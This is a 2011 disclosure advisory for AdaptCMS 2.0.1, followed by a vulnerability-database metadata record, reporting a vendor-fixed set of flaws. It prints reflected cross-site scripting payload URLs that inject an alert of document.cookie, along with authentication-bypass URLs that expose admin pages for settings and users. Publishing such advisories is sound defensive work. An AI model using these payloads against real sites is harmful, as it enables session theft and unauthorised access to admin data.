AdaptCMS 2.0.1 Multiple security vulnerabilities

2011-09-26T00:00:00

Description

Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities Advisory ID: SSCHADV2011-018 Author: Stefan Schurtz Affected Software: Successfully tested on AdaptCMS 2.0.1 Vendor URL: http://www.adaptcms.com/ Vendor Status: fixed CVE-ID: - ========================== Vulnerability Description: ========================== AdaptCMS 2.0.1 is prone to multiple security vulnerabilities ================== Technical Details: ================== Cross-site Scripting http://<target>/AdaptCMS/admin.php?view=</script><script>alert(documentcookie)</script> http://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script> http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script> http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script> Authentication bypass / Information Disclosure http://<target>/AdaptCMS/admin.php?view=/&view=settings http://<target>/AdaptCMS/admin.php?view=/&view=users http://<target>/AdaptCMS/admin.php?view=/&view=groups http://<target>/AdaptCMS/admin.php?view=/&view=levels http://<target>/AdaptCMS/admin.php?view=/&view=stats ========= Solution: ========= "Get the latest AdaptCMS Files" from the admin area ==================== Disclosure Timeline: ==================== 24-Sep-2011 - informed developers 24-Sep-2011 - Release date of this security advisory 25-Sep-2011 - fixed by vendor 25-Sep-2011 - post on BugTraq ======== Credits: ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References: =========== http://www.adaptcms.com/ http://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole http://www.rul3z.de/advisories/SSCHADV2011-018.txt

{"id": "SECURITYVULNS:DOC:27066", "bulletinFamily": "software", "title": "AdaptCMS 2.0.1 Multiple security vulnerabilities", "description": "Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities\r\nAdvisory ID: \tSSCHADV2011-018\r\nAuthor: \tStefan Schurtz\r\nAffected Software: Successfully tested on AdaptCMS 2.0.1\r\nVendor URL: http://www.adaptcms.com/\r\nVendor Status: fixed\r\nCVE-ID: \t-\r\n\r\n==========================\r\nVulnerability Description:\r\n==========================\r\n\r\nAdaptCMS 2.0.1 is prone to multiple security vulnerabilities\r\n\r\n==================\r\nTechnical Details:\r\n==================\r\n\r\nCross-site Scripting\r\n\r\nhttp://<target>/AdaptCMS/admin.php?view=</script><script>alert(documentcookie)</script>\r\nhttp://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script>\r\nhttp://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>\r\nhttp://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>\r\n\r\nAuthentication bypass / Information Disclosure\r\n\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=settings\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=users\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=groups\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=levels\r\nhttp://<target>/AdaptCMS/admin.php?view=/&view=stats\r\n\r\n=========\r\nSolution:\r\n=========\r\n\r\n"Get the latest AdaptCMS Files" from the admin area\r\n\r\n====================\r\nDisclosure Timeline:\r\n====================\r\n\r\n24-Sep-2011 - informed developers\r\n24-Sep-2011 - Release date of this security advisory\r\n25-Sep-2011 - fixed by vendor\r\n25-Sep-2011 - post on BugTraq\r\n\r\n========\r\nCredits:\r\n========\r\n\r\nVulnerabilities found and advisory written by Stefan Schurtz.\r\n\r\n===========\r\nReferences:\r\n===========\r\n\r\nhttp://www.adaptcms.com/\r\nhttp://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole\r\nhttp://www.rul3z.de/advisories/SSCHADV2011-018.txt\r\n", "published": "2011-09-26T00:00:00", "modified": "2011-09-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27066", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:42", "edition": 1, "viewCount": 25, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11920"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645532354, "score": 1659803227}, "_internal": {"score_hash": "a4c599a046deae1d4f0ed1c54a2b01c3"}}